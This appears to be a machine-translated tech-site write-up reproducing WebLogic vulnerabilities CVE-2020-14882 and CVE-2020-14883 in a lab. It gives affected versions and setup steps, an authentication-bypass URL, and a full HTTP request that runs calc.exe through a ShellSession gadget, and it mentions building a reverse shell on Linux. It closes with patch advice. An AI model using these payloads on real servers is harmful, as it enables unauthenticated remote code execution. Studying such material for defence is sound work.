Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to achieve the analysis of WebLogic unauthorized command execution vulnerabilities CVE-2020-14882 and CVE-2020-14883. Many people may not know much about it. In order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

Introduction to 0x00

WebLogic is an application server produced by American Oracle Company. Specifically, it is a middleware based on JAVAEE architecture. WebLogic is a Java application server for developing, integrating, deploying and managing large-scale distributed Web applications, network applications and database applications. The dynamic function of Java and the security of Java Enterprise standard are introduced into the development, integration, deployment and management of large-scale network applications.

Weblogic vs. Tomcat

Overview of 0x01 vulnerabilities CVE-2020-14882: code execution vulnerabilities

Remote attackers can construct special HTTP requests, take over WebLogic Server Console without authentication, and execute arbitrary code in WebLogic Server Console.

CVE-2020-14883: permission bypass vulnerability

Remote attackers can construct special HTTP requests to take over WebLogic Server Console without authentication.

0x02 affects version

Oracle:Weblogic:

10.3.6.0.0

12.1.3.0.0

12.2.1.3.0

12.2.1.4.0

14.1.1.0.0

0x03 environment building

Windows2016+WebLogic12.2.1.4

1. Officially downloaded from Oracle, WebLogic12.2.1.4 version

Https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

two。 Java environment is required to install weblogic, where the java version is jdk1.8.0_191

Run the WebLogic installation with administrator privileges after the 3.java environment installation is complete

Java-jar fmw_12.2.1.4.0_wls_lite_generic.jar

4. Select the next step during installation, and select "full installation with examples" in "installation Type".

5. In the configuration wizard, set the password and click create

6. After the installation is complete, the following interface appears when the browser accesses 127.0.0.1:7001/console

0x04 vulnerability recurrence 1.CVE-2020-14883: permission bypass vulnerability

1.1 low-privileged users access the following URL to the administrative background page without authorization

Http://192.168.207.149:7001/console/css/%252e%252e%252fconsole.portal

2. CVE-2020-14882: code execution vulnerability

2.1 use burp to grab the packet on the home page, and then send it to the Repeater module to construct payload

2.2 access is bypassed by illegal characters at url, and then executed by invoking commands through Gadget

Payload: / console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession (% 22java.lang.Runtime.getRuntime () .exec (% 27calc.exe%27);% 22)

The complete packet is as follows:

GET / console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession (% 22java.lang.Runtime.getRuntime () .exec (% 27calc.exe%27);% 22) HTTP/1.1

Host: 192.168.207.149:7001

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: ADMINCONSOLESSIONCOmUfkcR8Zr7DOmC0qhwkfhOdOVZiWlubIcjtgogLbSWVXCAlaccessible; think_lang=zh-cn; PHPSESSID=0701339d3e42f0edcf094f63a3919f90; JSESSIONIDationz3Mill RYQeKtqCOmUfkcph5xyWXJWfYJQFE19wRWMHtS2JPtA14MaHcolors

Connection: close

3. Click "send" and wait on the server to see the calculator pop up.

Note: in linux, you can rebound shell by constructing payload.

0x05 repair recommendation

1. Download the latest vulnerability patch on Oracle officially

Https://support.oracle.com/portal/

After reading the above, do you have any further understanding of how to implement the analysis of WebLogic unauthorized command execution vulnerabilities CVE-2020-14882 and CVE-2020-14883? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.